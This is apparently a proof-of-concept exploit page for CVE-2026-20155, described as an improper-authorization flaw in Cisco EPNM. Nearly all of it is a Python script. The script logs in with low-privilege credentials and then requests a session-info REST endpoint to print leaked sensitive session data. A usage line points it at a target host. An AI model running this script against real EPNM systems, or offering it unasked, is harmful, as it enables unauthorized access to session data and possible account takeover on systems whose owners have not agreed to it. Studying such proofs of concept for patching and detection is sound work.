CVE-2026-20155 Cisco EPNM越权访问漏洞

import requests def exploit_cve_2026_20155(target_url, username, password): """ PoC for CVE-2026-20155: Cisco EPNM Privilege Escalation via Improper Authorization. This script demonstrates how a low-privileged user can access sensitive session info. """ session = requests.Session() login_endpoint = f"{target_url}/webui/login" vulnerable_api = f"{target_url}/webui/rest/api/session-info" # Step 1: Authenticate with low privileges creds = {"username": username, "password": password} session.post(login_endpoint, data=creds) # Step 2: Access the vulnerable endpoint response = session.get(vulnerable_api) if response.status_code == 200: print("[+] Vulnerability Exploited Successfully!") print("[+] Leaked Sensitive Data:") print(response.text) else: print("[-] Failed to exploit the vulnerability.") # Usage: exploit_cve_2026_20155("https://target-ip", "user", "pass")